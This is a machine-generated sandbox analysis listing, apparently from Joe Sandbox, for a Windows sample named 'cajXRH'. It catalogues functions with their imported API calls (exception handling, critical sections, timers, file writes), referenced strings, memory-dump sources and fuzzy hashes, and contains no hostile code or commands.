Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: 5C51C332B19A428EDB14EB1BD44463E7391EBA4BA8F108171DB4E537A9DF7DE845C700

Function 00007FFE132059C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE132059F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE13205AD8

Strings

csm, xrefs: 00007FFE13205B2A
csm, xrefs: 00007FFE13205A12

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: af04bb4df9dff6b50d74e5e412080b2ea54cde7e5d77434e64863f510f254d93
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: A751903290CB82CEEB64AB12948436C77A0EBA4BA4F244175DA4D67BA5CF3CF458C700

Function 00007FFE132051D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE13205237
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE13205283

Strings

MOC, xrefs: 00007FFE1320524B
RCC, xrefs: 00007FFE13205253

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: fa8a6fa0d2bee757c33d907a1ee077f6af99ac06a4bdf83e559a3897f91b2a08
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: 55617F3290CB8589DB60AF16E4403AEB7A0FBD5BA4F144265EB9C17B65DF7CD194CB00

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

kernel32.dll, xrefs: 000000014000EE26
InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FFE1320E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFE1320E473
WriteFile.KERNEL32 ref: 00007FFE1320E73B
WriteFile.KERNEL32 ref: 00007FFE1320E781
GetLastError.KERNEL32 ref: 00007FFE1320E837

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: 2f4e42e3cda2d1260206cf9af723085cb5dd06dacd5d765ece9597380c2fb2ea
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: 8FD1B132B18E818DE711DF76D4802EC37A1FBA47A8B144266DE5D67BA9DE38D44AC340

Function 00007FFE1320ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1320ED07), ref: 00007FFE1320EE38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1320ED07), ref: 00007FFE1320EEC3

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: 11ef1a8bf586a0d393a0e2522c75b2153d25744cad5abcbaff528ce9f7beea23
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: 3D91F972F18E518DF750AF26944027D2BA4FBA4BA8F144179DE4E776A5CF38D48AC300

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 00007FFE13202218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFE13202244
GetCurrentThreadId.KERNEL32 ref: 00007FFE13202252
GetCurrentProcessId.KERNEL32 ref: 00007FFE1320225E
QueryPerformanceCounter.KERNEL32 ref: 00007FFE1320226E

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: 272c76aa9800d4ea19af2232f6f9c397ac0027fa92f9c923c2e78f4976068d7e
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: 57114C22B14F058EEB00EB61E8442B833A4F7A9768F441A31EA2D567A4DF38D158C340

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FFE13205C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE13205C2A

Strings

csm, xrefs: 00007FFE13205C4F
csm, xrefs: 00007FFE13205DBE

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: f1d2e2fd17941ae0aed92f12a68203b378344e8b2e1918b10fa97cf588ceabe8
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: B971A23290CA81CED760AF16948477D7BA0FB94BA4F248176DE8C27AA9CB3CD459C744

Function 00007FFE13206298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE13206342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE1320636B

Strings

csm, xrefs: 00007FFE1320646B

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: 2e9e6dd85660fb2dc92949af328fe756a99b647852f2c460bc9243a0dd076ce6
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: 86514C36619B419AE630BF26E44026E77A4FB99BA0F100578EB8D17B65CF38E465CB00

Function 00007FFE1320EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFE1320EBA3
GetLastError.KERNEL32 ref: 00007FFE1320EBC5

Strings

U, xrefs: 00007FFE1320EB4F

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: 96d9921f371156dee5bc0b969e71a778a2e6af7f59015b0af30117a24051e558
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: F341C322B19E4189DB20EF66E4443AE67A0FBE87A4F404131EE4E977A4DF3CD445CB40

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FFE13210910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13203A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE13203A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FFE13210993

Strings

csm, xrefs: 00007FFE1321092B
f, xrefs: 00007FFE13210925

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: 2511db9295f67cd2b0af936af4d2ceb962597c6b3c27032a0458c945649b6add
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: 3A11B432B14B8589E750AF23A54116E6764EB95FD4F08C075EF881BB66CE3CD851C700

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FFE13203990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1320112F), ref: 00007FFE132039E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1320112F), ref: 00007FFE13203A21

Strings

csm, xrefs: 00007FFE13203A0E

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: c9adcb3f117668cf4dcdf6fa09084068a340d43751dfd92c3e390705219793ff
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: CF115B32618F8586EB209B16E40026AB7E4FB98B94F584270EFCD17B69DF3CD555CB00

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

